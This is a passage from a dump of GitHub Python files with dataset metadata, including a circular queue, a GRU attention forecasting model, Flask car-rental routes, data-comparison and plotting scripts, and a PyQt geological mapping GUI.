\n\n\"\"\"\n\n# Node Structure\nclass Node:\n    def __init__(self):\n        self.data = None\n        self.link = None\n\nclass Queue:\n    def __init__(self):\n        # Bind the pointers to the instance; bare local names here would be\n        # discarded as soon as __init__ returns.\n        self.front = None\n        self.rear = None\n\n# Function to insert into the circular queue\ndef enqueue(q, value):\n    temp = Node()\n    temp.data = value\n\n    if(q.front == None):\n        q.front = temp\n    else:\n        q.rear.link = temp\n\n    q.rear = temp\n    q.rear.link = q.front\n\n# Function to delete an element from the circular queue\ndef dequeue(q):\n    if(q.front == None):\n        print(\"Queue is empty\")\n        return -999999999999\n\n    # if this is the last node to be deleted\n    value = None # Value to be dequeued\n    if(q.front == q.rear):\n        value = q.front.data\n        q.front = None\n        q.rear = None\n    else: # There is more than one node\n        temp = q.front\n        value = temp.data\n        q.front = q.front.link\n        q.rear.link = q.front\n    return value\n\n# Function displaying the elements of the circular queue\ndef display_queue(q):\n    temp = q.front\n    print(\"Elements in Circular Queue are:\", end =\" \")\n    while(temp.link != q.front):\n        print(temp.data, end=\" \")\n        temp = temp.link\n    print(temp.data)\n\nif __name__=='__main__':\n    # Create an empty queue (front and rear are initialized in __init__)\n    q = Queue()\n\n    # Inserting elements in Circular Queue\n    enqueue(q, 14)\n    enqueue(q, 22)\n    enqueue(q, 6)\n\n    # Display elements present in Circular Queue\n    display_queue(q)\n\n    # Deleting elements from Circular Queue\n    print(\"Deleted value =\", dequeue(q))\n    print(\"Deleted value =\", dequeue(q))\n\n    # Remaining elements in Circular Queue\n    display_queue(q)\n\n    enqueue(q, 9)\n    enqueue(q, 20)\n    display_queue(q)\n","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/LinkedLists/CircularLinkedLists/circular_ll_implementation.py","file_name":"circular_ll_implementation.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"24187746454","text":"def print_phonebook():\n    with open('Phonebook.csv', 'r', encoding=\"UTF-8\") as f:\n        phonebook = f.read().replace(\",\", \" \")\n    print(phonebook)\n\ndef search():\n    with open('Phonebook.csv', 'r', encoding=\"UTF-8\") as f:\n        phonebook = f.read().split()[1:]\n    text = input(\"Enter what you want to find: \")\n    flag = False  # becomes True once at least one match is printed\n    for line in phonebook:\n        if text in line:\n            print(line.replace(\",\", \" \"))\n            flag = True\n    if not flag:\n        print(\"No such record found\")\n\n","repo_name":"DanilVis/Course_Python","sub_path":"PythonCourse/Seminar7/Homework_7_Phone_book/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15685883258","text":"import torch.nn as nn\nimport random\nimport torch\nimport torch.nn.functional as F\nimport sys\nfrom layers.Embed import DataEmbedding\n\nclass Encoder(nn.Module):\n    def __init__(self, enc_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout):\n        super().__init__()\n        \n        self.embedding = DataEmbedding(enc_in, emb_dim, embed, freq, dropout)\n        self.rnn = nn.GRU(emb_dim, enc_hid_dim, bidirectional = True, batch_first=True)\n        self.fc = nn.Linear(enc_hid_dim * 2, dec_hid_dim)\n        \n    def forward(self, x_enc, x_mark_enc):\n        \n        #x_enc = [batch size, x_enc len, enc_in] (the GRU is batch_first)\n        \n        embedded = self.embedding(x_enc, x_mark_enc)\n        #embedded = [batch size, x_enc len, emb dim]\n        \n        outputs, hidden = self.rnn(embedded)\n        \n        #outputs = [batch size, x_enc len, hid dim * num directions]\n        #hidden = [n layers * num directions, batch size, hid dim]\n        \n        #hidden is stacked [forward_1,
backward_1, forward_2, backward_2, ...]\n #outputs are always from the last layer\n \n #hidden [-2, :, : ] is the last of the forwards RNN \n #hidden [-1, :, : ] is the last of the backwards RNN\n \n #initial decoder hidden is final hidden state of the forwards and backwards \n # encoder RNNs fed through a linear layer\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2,:,:], hidden[-1,:,:]), dim = 1)))\n \n #outputs = [x_enc len, batch size, enc hid dim * 2]\n #hidden = [batch size, dec hid dim]\n \n return outputs, hidden\n\n\n\nclass Attention(nn.Module):\n def __init__(self, enc_hid_dim, dec_hid_dim):\n super().__init__()\n \n self.attn = nn.Linear((enc_hid_dim * 2) + dec_hid_dim, dec_hid_dim)\n self.v = nn.Linear(dec_hid_dim, 1, bias = False)\n \n def forward(self, hidden, encoder_outputs):\n \n #hidden = [batch size, dec hid dim]\n #encoder_outputs = [batch size, x_enc len, enc hid dim * 2]\n \n batch_size, x_enc_len = encoder_outputs.shape[0], encoder_outputs.shape[1]\n \n #repeat decoder hidden state x_enc_len times\n hidden = hidden.unsqueeze(1).repeat(1, x_enc_len, 1)\n \n #hidden = [batch size, x_enc len, dec hid dim]\n \n energy = torch.tanh(self.attn(torch.cat((hidden, encoder_outputs), dim = 2))) \n \n #energy = [batch size, x_enc len, dec hid dim]\n\n attention = self.v(energy).squeeze(2)\n \n #attention= [batch size, x_enc len]\n \n return F.softmax(attention, dim=1)\n\n\nclass Decoder(nn.Module):\n def __init__(self, dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout, attention):\n super().__init__()\n\n self.attention = attention\n \n self.embedding = DataEmbedding(dec_in, emb_dim, embed, freq, dropout)\n \n self.rnn = nn.GRU((enc_hid_dim * 2) + emb_dim, dec_hid_dim, batch_first=True)\n \n self.fc_out = nn.Linear((enc_hid_dim * 2) + dec_hid_dim + emb_dim, dec_in)\n \n def forward(self, input, input_mark, hidden, encoder_outputs):\n \n #hidden = [batch size, dec hid dim]\n #encoder_outputs = [batch size, x_enc len, enc hid dim * 2]\n \n #input = [1, batch size]\n \n embedded = self.embedding(input, input_mark)\n \n #embedded = [batch size, 1, emb dim]\n \n a = self.attention(hidden, encoder_outputs)\n \n #a = [batch size, x_enc len]\n \n a = a.unsqueeze(1)\n \n #a = [batch size, 1, x_enc len]\n \n weighted = torch.bmm(a, encoder_outputs)\n \n #weighted = [batch size, 1, enc hid dim * 2]\n \n rnn_input = torch.cat((embedded, weighted), dim = 2)\n \n #rnn_input = [batch size, 1, (enc hid dim * 2) + emb dim]\n \n output, hidden = self.rnn(rnn_input, hidden.unsqueeze(0))\n \n #output = [seq len, batch size, dec hid dim * n directions]\n #hidden = [n layers * n directions, batch size, dec hid dim]\n \n #seq len, n layers and n directions will always be 1 in this decoder, therefore:\n #output = [batch size, 1, dec hid dim]\n #hidden = [1, batch size, dec hid dim]\n #this also means that output == hidden\n assert (output == hidden.transpose(1, 0)).all()\n prediction = self.fc_out(torch.cat((output, weighted, embedded), dim = 2))\n \n #prediction = [batch size, seq_len, output dim]\n return prediction, hidden.squeeze(0)\n\nclass GruAttention(nn.Module):\n def __init__(self, args):\n super().__init__()\n enc_in, dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout = \\\n args.enc_in, args.dec_in, args.d_model, args.d_model, args.d_model, args.embed, \\\n args.freq, args.dropout\n self.pred_len = args.pred_len\n self.teacher_forcing_ratio = args.teacher_forcing_ratio\n \n attention = Attention(enc_hid_dim, dec_hid_dim)\n self.encoder = Encoder(enc_in, emb_dim, 
enc_hid_dim, dec_hid_dim, embed, freq, dropout)\n self.decoder = Decoder(dec_in, emb_dim, enc_hid_dim, dec_hid_dim, embed, freq, dropout, attention)\n \n def forward(self, x_enc, x_mark_enc, x_dec, x_mark_dec):\n \n #x_enc = [x_enc len, batch size, n_features]\n #x_dec = [x_dec len, batch size, n_features]\n #teacher_forcing_ratio is probability to use teacher forcing\n #e.g. if teacher_forcing_ratio is 0.75 we use ground-truth inputs 75% of the time\n if self.training:\n teacher_forcing_ratio = self.teacher_forcing_ratio\n else:\n teacher_forcing_ratio = 0\n batch_size, x_dec_len, dec_in = x_dec.shape\n #tensor to store decoder outputs\n outputs = torch.zeros(batch_size, x_dec_len-1, dec_in).to(x_enc.device)\n \n #last hidden state of the encoder is the context\n encoder_outputs, hidden = self.encoder(x_enc, x_mark_enc)\n \n input = x_dec[:, 0, :].unsqueeze(dim=1)\n input_mark = x_mark_dec[:, 0, :].unsqueeze(dim=1)\n for t in range(1, x_dec_len):\n #insert input token embedding, previous hidden state and the context state\n #receive output tensor (predictions) and new hidden state\n output, hidden = self.decoder(input, input_mark, hidden, encoder_outputs)\n \n #place predictions in a tensor holding predictions for each token\n outputs[:, t-1, :] = output.squeeze(dim=1)\n \n #decide if we are going to use teacher forcing or not\n teacher_force = random.random() < teacher_forcing_ratio\n \n #if teacher forcing, use actual next token as next input\n input = x_dec[:, t, :].unsqueeze(dim=1) if teacher_force else output\n input_mark = x_mark_dec[:, t, :].unsqueeze(dim=1)\n\n return outputs[:, -self.pred_len:, :]\n \nif __name__ == '__main__':\n enc_in, dec_in, emb_dim, enc_hid_dim, dec_hid_dim = 45, 45, 512, 512, 512\n batch_size, seq_len = 32, 10\n x = torch.randn(batch_size, seq_len, enc_in)\n model1 = Encoder(enc_in, emb_dim, enc_hid_dim, dec_hid_dim, 0.2)\n # hidden, cell = model1(x)\n atten = Attention(enc_hid_dim, dec_hid_dim)\n model2 = Decoder(dec_in, emb_dim, enc_hid_dim, dec_hid_dim, 0.2,atten)\n # model2(x, hidden, cell)\n y = torch.randn(batch_size, 10, dec_in)\n model = GruAttention(model1, model2, torch.device(\"cuda\"))\n output = model(x, y)\n print(\"\")","repo_name":"hyliush/deep-time-series","sub_path":"models/seq2seq/EDGruAttention.py","file_name":"EDGruAttention.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"38"} +{"seq_id":"37983626815","text":"import numpy as np\nimport os\nfrom pdb import set_trace as st\nimport matplotlib.pyplot as plt\n\n\n# Paths to segmented track file\npath_folder1 = r'Z:\\Data\\synchronised_imu_kinect_frames_no_interpolation'\npath_folder2 = r'Z:\\Data\\synchronised_imu_kinect_frames'\n\n# path1 = r'Z:\\Data\\synchronised_imu_kinect_frames_no_interpolation\\20230522_165057 - 015 - KinectDataFrames.npy'\n# path2 = r'Z:\\Data\\synchronised_imu_kinect_frames\\20230519_170143 - 015 - KinectDataFrames.npy'\n\n# List all Kinect frame files\nlist1 = os.listdir(path_folder1)\nlist2 = os.listdir(path_folder2)\nlist1 = [e for e in list1 if ' - KinectDataFrames.npy' in e]\nlist2 = [e for e in list2 if ' - KinectDataFrames.npy' in e]\n\n# Loop on the listed data files\nfor file_idx in range(len(list1)):\n # Get current file\n file1 = list1[file_idx]\n # Extract subject idx\n pos = file1.find(' - KinectDataFrames.npy')\n subject_idx = file1[pos-3:pos]\n print('Checking Kinect tracks of subject %s' % (subject_idx))\n # Get corresponding file in the second folder\n 
corr_file = [e for e in list2 if subject_idx+' - KinectDataFrames.npy' in e]\n file2 = corr_file[0]\n # Load data frames\n f1 = np.load(os.path.join(path_folder1,file1))\n f2 = np.load(os.path.join(path_folder2,file2))\n\n # Look for differences in frames between f1 and f2\n for idx in range(len(f1)):\n tmp1 = f1[idx]\n tmp2 = f2[idx]\n if not (tmp1==tmp2).all():\n print(' Differences in frame %d/%d' % (idx+1,len(f1)))\n diff = tmp1-tmp2\n for column_idx in range(diff.shape[1]):\n # plot the two tracks\n if np.sum(diff[:,column_idx]) != 0:\n plt.subplot(2,1,1)\n plt.plot(tmp1[:,column_idx],color='b')\n plt.subplot(2,1,2)\n plt.plot(tmp2[:,column_idx],color='r')\n plt.show()\n","repo_name":"Frederic-Li-Hanchen/ScreenFM-test-scripts","sub_path":"plotting_scripts/plot_tracks.py","file_name":"plot_tracks.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"535017684","text":"\"\"\"\r\nRoutes and views for the flask application.\r\n\"\"\"\r\n\r\nfrom datetime import datetime\r\nfrom flask import render_template,request, session\r\nfrom car_rent import app\r\n\r\nimport requests\r\nimport json\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n \"\"\"Renders the home page.\"\"\"\r\n return \"Home\"\r\n\r\n\r\n@app.route('/register', methods=['POST'])\r\ndef register():\r\n \"\"\"register user in the system\r\n\r\n receive user input in post request, transfer request in json format to API cloud restful interface\r\n then get response from API cloud and render template page register.html\r\n\r\n Returns:\r\n rendered template register.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.post(url=app.config['CLOUD_API_URL']+\"add_user\", headers=headers, json=request.form)\r\n \r\n result = json.loads(r.content)\r\n return render_template('register.html',result = result)\r\n\r\n\r\n@app.route('/login', methods=['POST'])\r\ndef login():\r\n \"\"\"login user into the system\r\n\r\n receive username and password from post parameters. send back to API cloud to validate.\r\n fail to verify, response front end with result message.\r\n succeed to verify, save username in session object for future usage and response with\r\n rendered index.html\r\n\r\n Returns:\r\n rendered template index.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.post(url=app.config['CLOUD_API_URL']+\"login_user\", headers=headers, json=request.form)\r\n result = json.loads(r.content)\r\n \r\n if (result[\"status\"]!=0):\r\n return result['message']\r\n \r\n session['username'] = result['username']\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/list_available_cars', methods=['GET'])\r\ndef list_available_cars(): \r\n \"\"\"list available cars in the system\r\n\r\n request api back end for all the available cars. API service response with information\r\n in json format\r\n render template list_available_cars.html with data\r\n\r\n Returns:\r\n rendered template list_available_cars.html\r\n \"\"\"\r\n\r\n #headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"list_available_cars\")\r\n result = json.loads(r.content)\r\n return render_template('list_available_cars.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/search_cars', methods=['POST'])\r\ndef search_cars(): \r\n \"\"\"search cars\r\n\r\n receive search parameters from post. 
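    (For illustration only — these field names are assumed, not defined by the\r\n    API: a form such as {\"brand\": \"toyota\", \"seats\": \"4\"} is forwarded verbatim\r\n    as JSON, and matching rows come back in result['data'] for the template.)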
send back to API cloud to search\r\n fail to verify, response front end with result message.\r\n succeed to verify, save username in session object for future usage and response with\r\n rendered index.html\r\n\r\n Returns:\r\n rendered template search_cars.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"search_cars\",headers=headers, json=request.form )\r\n result = json.loads(r.content)\r\n return render_template('search_cars.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/book_a_car', methods=['POST'])\r\ndef book_a_car():\r\n \"\"\"book a car\r\n\r\n receive booking parameters from post. send back to API cloud to book, \r\n response front end with result message.\r\n rendered book_a_car.html\r\n\r\n Returns:\r\n rendered template book_a_car.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n params ={\"username\":session['username'], \"carid\":request.form['carid'],\"pickup_ts\":request.form['pickup_ts']}\r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"book_a_car\", headers=headers, json = json.dumps(params))\r\n result = json.loads(r.content)\r\n return render_template('book_a_car.html',result=result)\r\n\r\n\r\n@app.route('/cancel_a_book', methods=['POST'])\r\ndef cancel_a_book(): \r\n \"\"\"cancel a car booking\r\n\r\n Cancel a booking. send back post parameters to API cloud.\r\n response front end with result message.\r\n rendered book_a_car.html\r\n\r\n Returns:\r\n rendered template book_a_car.html\r\n \"\"\"\r\n headers = {'Content-Type': 'application/json'} \r\n params ={\"username\":session['username'], \"rent_id\":request.form['rent_id']}\r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"cancel_a_book\", headers=headers, json = json.dumps(params))\r\n result = json.loads(r.content)\r\n return render_template('cancel_a_book.html',message=result['message'])\r\n\r\n\r\n@app.route('/list_rent_history', methods=['GET'])\r\ndef list_rent_history():\r\n \"\"\"list user's rent history\r\n\r\n Call API cloud service to retrieve use rent history.\r\n response front end with result message in list_rent_history.html\r\n\r\n Returns:\r\n rendered template list_rent_history.html\r\n \"\"\"\r\n #headers = {'Content-Type': 'application/json'} \r\n r = requests.get(url=app.config['CLOUD_API_URL']+\"list_rent_history/\"+session['username'])\r\n result = json.loads(r.content)\r\n return render_template('list_rent_history.html',data_list=result['data'])\r\n\r\n\r\n@app.route('/logout', methods=['GET'])\r\ndef logout():\r\n \"\"\"logout user \r\n\r\n clear up use session information\r\n\r\n Returns:\r\n rendered template logout.html\r\n \"\"\"\r\n\r\n # remove the username from the session if it's there\r\n session.pop('username', None)\r\n return render_template('logout.html')\r\n\r\n\r\n@app.route('/test', methods=['GET'])\r\ndef test():\r\n return app.config['CLOUD_API_URL']\r\n","repo_name":"s3638151/IOT2","sub_path":"car_rent/car_rent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28072375455","text":"# Extract prediction from valPredictions file\n# original: 'gqa3_horovod_original_512x32x4_gadasum_lr1.56e-6_q1_or_pc100_b16'\n# hybrid: 'gqa3_horovod_hybrid_512x32x4_gadasum_lr1.56e-6_q1_hb_un_pc020_b16'\n# logic:\n# 'gqa3_horovod_hybrid_E4_512x32x4_fw_tflSS_l1.0_w1e-1_gadasum_lr1.56e-6_q1_hb_un_pc020_b16'\nimport argparse\nimport json\n\ndef 
extract_preds(expname):\n with open('./{exp}/valPredictions-{exp}.json'.format(exp=expname),'r') as json_fh:\n predictions = json.load(json_fh)\n return {p['questionId']:p['prediction'] for p in predictions}\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--infile', default='',\n type=str, help='path to valPredictions.json file')\n parser.add_argument('-o', '--outfile', default='',\n type=str, help='path to valPredicts.json file')\n args = parser.parse_args()\n preds_dict = extract_preds(args.infile)\n with open(args.outfile,'w') as json_fh:\n json.dump(preds_dict,json_fh)\n\nif __name__ == '__main__':\n main()\n","repo_name":"lengoanhcat/consistent_gqa","sub_path":"preds_postprocess/extract_preds.py","file_name":"extract_preds.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12562319817","text":"def pm():\n N=int(input())\n while N<3 or N%2==1:\n print(\"error\")\n N = int(input())\n pme=set()\n for i in range(2,N+1):\n pme.add(i)\n for i in range(2,N+1):\n if i in pme:\n for k in range(2*i,N+1,i):\n if k in pme:\n pme.remove(k)\n for e in pme:\n f=N-e\n if f>=e and f in pme:\n print(N,\"=\",e,\"+\",f)\npm()","repo_name":"czy0538/Python_learning","sub_path":"2019小学期/考试之前/22验证歌德巴赫猜想.py","file_name":"22验证歌德巴赫猜想.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26381637832","text":"import re\nimport sys\nfrom sklearn.ensemble import RandomForestClassifier\nimport random\n\nfrom skimage import measure\nimport cv2\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtCore import pyqtSlot, Qt, QThread, pyqtSignal\nimport matplotlib as mpl\nimport matplotlib.style as mplStyle\n\nfrom scipy.interpolate import griddata\n\nfrom CSw_sjk import Ui_MainWindow\n\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow,\n QSplitter, QColorDialog, QLabel, QComboBox, QTreeWidgetItem, QProgressDialog,\n QTableWidgetItem, QMessageBox)\nfrom PyQt5.QtCore import pyqtSlot, QDir, QIODevice, QFile, QTextStream\nfrom PyQt5.QtWidgets import QFileDialog\nfrom myfigure import QmyFigure\n\nimport numpy as np\nimport CSw_dcfbx_Slot\n\nCJX = {}\nBHD = {}\nKXD = {}\nSTL = {}\n\nDJDZSJ = {}\nXSPMSJ = []\nSKSJ = []\nCSSJ = []\nCJDYSJ = {}\nZSJS = []\nXSQX = []\nCYJS = []\nDS = []\nCJDYZB = {}\n\n\n\nclass QmyMainWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent) # 调用父类构造函数,创建窗体\n self.ui = Ui_MainWindow() # 创建UI对象\n self.ui.setupUi(self) # 构造UI界面\n\n self.stepx = 50\n self.stepy = 50\n self.qlqFloor = [] #潜力区所有需要筛选层的层名\n self.qlqBinary = {}\n self.qlqXb = {}\n self.qlqYb = {}\n self.qlqContours = {}\n self.qlqTable = {}\n self.qlqTableList = []\n\n # 展开节点\n self.ui.treeWidget.topLevelItem(0).setExpanded(True)\n self.ui.treeWidget.topLevelItem(1).setExpanded(True)\n # self.ui.treeWidget.setAlternatingRowColors(True)\n self.ui.treeWidget.clicked.connect(self.on_treeWidget_clicked)\n self.ui.treeWidget.topLevelItem(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(2).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(3).setIcon(0, 
QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(0).child(4).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(0).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(1).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(2).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(3).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(4).setIcon(0, QtGui.QIcon('images/122.bmp'))\n self.ui.treeWidget.topLevelItem(1).child(5).setIcon(0, QtGui.QIcon('images/122.bmp'))\n\n self.setWindowState(Qt.WindowMaximized) # 窗口最大化显示\n # self.ui.tabWidget.setVisible(False) # 隐藏\n self.ui.tabWidget.clear() # 清除所有页面\n self.ui.tabWidget.setTabsClosable(True) # Page有关闭按钮\n\n\n mplStyle.use(\"classic\") # 使用样式,必须在绘图之前调用,修改字体后才可显示汉字\n mpl.rcParams['font.sans-serif'] = ['KaiTi', 'SimHei'] # 显示汉字为 楷体, 汉字不支持 粗体,斜体等设置\n mpl.rcParams['font.size'] = 12\n ## Windows自带的一些字体\n ## 黑体:SimHei 宋体:SimSun 新宋体:NSimSun 仿宋:FangSong 楷体:KaiTi\n mpl.rcParams['axes.unicode_minus'] = False # 减号unicode编码\n\n self.__fig = None # Figue对象\n self.__curAxes = None # 当前操作的Axes,为了方便单独用变量\n # self.__createFigure() # 创建Figure和FigureCanvas对象,初始化界面\n # self.__drawFig2X1() # 绘图\n\n ## ==============自定义功能函数========================\n\n # @pyqtSlot(int)\n # def on_tabWidget_currentChanged(self, index): ##tabWidget当前页面变化\n # print(self.ui.tabWidget.widget(index))\n\n\n @pyqtSlot(int)\n def on_tabWidget_tabCloseRequested(self, index): ##分页关闭时关闭窗体\n print(\"tabclose\")\n if (index < 0):\n return\n aForm = self.ui.tabWidget.widget(index)\n aForm.close()\n\n ##树组件响应画图\n @pyqtSlot()\n def on_treeWidget_clicked(self):\n try:\n itemParent = self.ui.treeWidget.currentItem().parent()\n item = self.ui.treeWidget.currentItem()\n\n if itemParent.text(0) == \"沉积相\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = CJX[item.text(0)][0] # float 型\n y = CJX[item.text(0)][1]\n v = CJX[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq1 = griddata((x, y), v, (xq, yq), method=\"linear\")\n vq = griddata((x, y), v, (xq, yq), method=\"nearest\")\n\n\n for i in range(vq1.shape[0]):\n for j in range(vq1.shape[1]):\n if (np.isnan(vq1[i][j]) == True):\n vq[i][j] = vq1[i][j]\n\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n # ax1.plot(t, y1, 'r-o', label=\"sin\", linewidth=2, markersize=5) # 绘制一条曲线\n # ax1.plot(t, y2, 'b--', label=\"cos\", linewidth=2) # 绘制一条曲线\n # ax1.set_xlabel('X 轴') # X轴标题\n # ax1.set_ylabel('Y 轴') # Y轴标题\n # ax1.set_xlim([0, 10]) # X轴坐标范围\n # ax1.set_ylim([-1.5, 1.5]) # Y轴坐标范围\n # ax1.set_title(\"三角函数曲线\")\n # ax1.legend() # 自动创建图例\n fig.fig.canvas.draw() ##刷新\n\n print(item.text(0))\n\n elif itemParent.text(0) == \"孔隙度\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n 
fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = KXD[item.text(0)][0] # float 型\n y = KXD[item.text(0)][1]\n v = KXD[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n # for i in range(vq.shape[0]):\n # for j in range(vq.shape[1]):\n # if np.isnan(vq[i][j]) == False:\n # vq[i][j] = vq[i][j].astype(int)\n\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() #刷新\n print(item.text(0))\n\n\n elif itemParent.text(0) == \"渗透率\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = STL[item.text(0)][0] # float 型\n y = STL[item.text(0)][1]\n v = STL[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n for i in range(vq.shape[0]):\n for j in range(vq.shape[1]):\n if np.isnan(vq[i][j]) == False:\n vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n\n elif itemParent.text(0) == \"含油饱和度\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig = QmyFigure(self)\n fig.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n x = BHD[item.text(0)][0] # float 型\n y = BHD[item.text(0)][1]\n v = BHD[item.text(0)][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n print(self.stepx)\n print(self.stepy)\n\n xq = list(range(int(min(x)), int(max(x)), self.stepx))\n yq = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xq = np.array(xq)\n yq = np.array(yq)\n\n xq, yq = np.meshgrid(xq, yq)\n\n vq = griddata((x, y), v, (xq, yq), method=\"linear\")\n\n # for i in range(vq.shape[0]):\n # for j in range(vq.shape[1]):\n # if np.isnan(vq[i][j]) == False:\n # vq[i][j] = vq[i][j].astype(int)\n\n ax1 = fig.fig.add_subplot(1, 1, 1, label=title) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im = ax1.pcolormesh(xq, yq, vq, )\n fig.fig.colorbar(im)\n\n fig.fig.canvas.draw() ##刷新\n print(item.text(0))\n\n elif itemParent.text(0) == \"沉积单元数据\":\n\n title = itemParent.text(0) + \":\" + item.text(0)\n fig1 = QmyFigure(self)\n 